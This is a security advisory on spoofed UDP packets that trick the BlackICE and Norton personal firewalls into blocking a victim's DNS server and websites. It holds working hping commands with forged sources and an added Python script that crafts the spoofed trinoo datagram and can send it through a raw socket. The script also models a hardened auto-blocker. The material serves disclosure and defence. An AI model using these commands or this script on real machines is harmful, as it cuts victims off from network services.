Overview

In a default installation, some personal firewall products ship with their auto-block function enabled. If you send such a PC a packet that imitates a high-severity attack and carries a spoofed source address, the firewall immediately blocks the spoofed address without any further judgement. Because nothing in a UDP datagram authenticates its source address, the firewall is acting purely on a header field the attacker controls. An intruder can therefore quickly and remotely make a large number of Internet addresses (the victim's DNS server, the web sites it uses) unreachable from the victim PC.

Example

I have tested this on BlackICE and Norton Personal Firewall. Below are the steps and the result of the test on BlackICE.

Step 1: A clean and DEFAULT installation of BlackICE Defender for Server (version 2.9.cap) on a Windows 2000 Server PC whose IP address is ip.add.of.victim.

Step 2: On a Linux box with hping (free software, available from www.hping.org) installed, run the following three commands:

---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---

These three commands all do the same thing: send five fake trinoo communication UDP packets (destination port 31335/udp, 4 bytes of data reading "PONG"; the 28 header bytes are 20 of IPv4 plus 8 of UDP) to our target machine ip.add.of.victim with a spoofed source address (-a): our DNS server ip.add.of.dnsserver, www.google.com and www.networkice.com.
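As an added illustration, not code from this advisory, from hping, or from BlackICE or Norton, the Python below first builds by hand the spoofed trinoo "PONG" datagram that the hping commands above emit, so the on-wire bytes and checksums are visible, and then feeds it to two model host firewalls: a naive one that, like the products tested here, blocks whatever source address the packet claims, and a hardened one that alerts on every match but auto-blocks only when the caller attests the source was verified (for instance a TCP peer that completed its handshake) and never blocks an address on a protected list such as the DNS resolver. The class names, the `source_verified` flag, the signature check and every address are constructed for the example; RFC 5737 documentation ranges stand in for the victim, the DNS server and the two web sites.

```python
"""Added example, not code from the advisory, hping, BlackICE or Norton.
Part 1 builds the spoofed trinoo "PONG" datagram that `hping -2 -p 31335 -e PONG
-d 4 -a <spoofed>` emits.  Part 2 models the auto-block decision: a naive blocker
that trusts the IP source field beside a hardened one that does not.
Every address below is constructed from the RFC 5737 documentation ranges."""
import socket
import struct
import sys


def rfc1071_checksum(data):
    """Internet checksum; over a buffer that already holds its checksum it returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_spoofed_udp(src, dst, dport, payload, sport=6000, ttl=64):
    """IPv4+UDP datagram with a forged source. Nothing in it proves `src` sent it."""
    src_b, dst_b, ulen = socket.inet_aton(src), socket.inet_aton(dst), 8 + len(payload)
    pseudo = struct.pack("!4s4sBBH", src_b, dst_b, 0, socket.IPPROTO_UDP, ulen)
    udp = struct.pack("!HHHH", sport, dport, ulen, 0) + payload
    udp_ck = rfc1071_checksum(pseudo + udp) or 0xFFFF     # 0 would mean "no checksum"
    udp = struct.pack("!HHHH", sport, dport, ulen, udp_ck) + payload

    def ip_header(ck):
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + ulen, 0, 0, ttl,
                           socket.IPPROTO_UDP, ck, src_b, dst_b)
    return ip_header(rfc1071_checksum(ip_header(0))) + udp


def parse(pkt):
    """Decode the fields a host firewall acts on and verify both checksums."""
    ihl = (pkt[0] & 0x0F) * 4
    sport, dport, ulen, _ = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    pseudo = struct.pack("!4s4sBBH", pkt[12:16], pkt[16:20], 0, pkt[9], ulen)
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "proto": pkt[9], "sport": sport, "dport": dport,
            "payload": pkt[ihl + 8:ihl + ulen],
            "checksums_ok": rfc1071_checksum(pkt[:ihl]) == 0
            and rfc1071_checksum(pseudo + pkt[ihl:ihl + ulen]) == 0}


def matches_trinoo(p):
    """Constructed signature: trinoo daemon-to-master PONG on 31335/udp."""
    return p["proto"] == socket.IPPROTO_UDP and p["dport"] == 31335 and p["payload"] == b"PONG"


class NaiveAutoBlocker:
    """The tested behaviour: block whatever source address the packet claims."""
    def __init__(self):
        self.blocked = set()

    def inspect(self, pkt):
        p = parse(pkt)
        if matches_trinoo(p):
            self.blocked.add(p["src"])


class HardenedAutoBlocker:
    """Always alerts; auto-blocks only a source the caller verified (e.g. a TCP peer
    that completed the handshake) and never one on the protected list."""
    def __init__(self, protected):
        self.protected, self.blocked, self.alerts = set(protected), set(), []

    def inspect(self, pkt, source_verified=False):
        p = parse(pkt)
        if not matches_trinoo(p):
            return
        self.alerts.append(p["src"])            # a UDP datagram is evidence, not proof
        if source_verified and p["src"] not in self.protected:
            self.blocked.add(p["src"])


def demo():
    """Replay the advisory's three spoofed senders against both blockers."""
    victim, resolver = "198.51.100.10", "192.0.2.53"
    spoofed = [resolver, "192.0.2.80", "192.0.2.81"]     # DNS server and two web sites
    pkts = [build_spoofed_udp(s, victim, 31335, b"PONG") for s in spoofed]
    naive, hard = NaiveAutoBlocker(), HardenedAutoBlocker(protected={resolver})
    for pkt in pkts:
        naive.inspect(pkt)
        hard.inspect(pkt)
    # Constructed contrast: the same trigger from a verified peer does get blocked.
    hard.inspect(build_spoofed_udp("203.0.113.5", victim, 31335, b"PONG"), source_verified=True)
    return {"wire_len": len(pkts[0]), "checksums_ok": parse(pkts[0])["checksums_ok"],
            "naive_blocked": naive.blocked, "hardened_blocked": hard.blocked,
            "hardened_alerts": len(hard.alerts)}


def send_raw(pkt):
    """Inject the datagram as hping does; needs root or CAP_NET_RAW."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        s.sendto(pkt, (socket.inet_ntoa(pkt[16:20]), 0))


if __name__ == "__main__":
    print(demo())
    if len(sys.argv) == 3:                          # usage: script <spoofed-src> <victim>
        send_raw(build_spoofed_udp(sys.argv[1], sys.argv[2], 31335, b"PONG"))
```

`demo()` runs entirely offline: the 32-byte result matches hping's "28 headers + 4 data bytes", the naive blocker ends up with all three claimed addresses (including the resolver) in its block list, and the hardened one has three alerts but blocks only the verified peer. `send_raw()` is only reached from the command line, since it opens a raw socket and so needs root or CAP_NET_RAW; `source_verified` is a stand-in for whatever handshake-based evidence a real product would need before treating a source address as trustworthy.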
Result: Each time a command is executed, the BlackICE icon in the Windows system tray flashes, and an entry is added automatically to BlackICE's Advanced Firewall Settings that blocks all packets from the spoofed address. The spoofed IP address becomes unreachable from the victim immediately.

The test steps and result for Norton Personal Firewall are almost the same, using

hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address

instead (two UDP packets from source port 6000 to destination port 2140, carrying the 2-byte data "13", with the source address spoofed).

Vendor Response

I contacted symsecurity@symantec.com and NSupport@iss.net on Sep 24, 2002. Symantec told me they have forwarded my concerns on to the appropriate team. BlackICE replied: "As the product exists now, there is nothing that can be done to correct this," and that they are in hopes that something can be done in a future release.

Affected Versions:
--
I have tested the following products:
BlackICE Defender for Server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton Personal Firewall 2002 (version 4.0)
All are vulnerable.
--

I want a better life.

Yiming Gong
Senior System Administrator
China Netcom
yiming@security.zz.ha.cn
http://security.zz.ha.cn
0086-371-7934907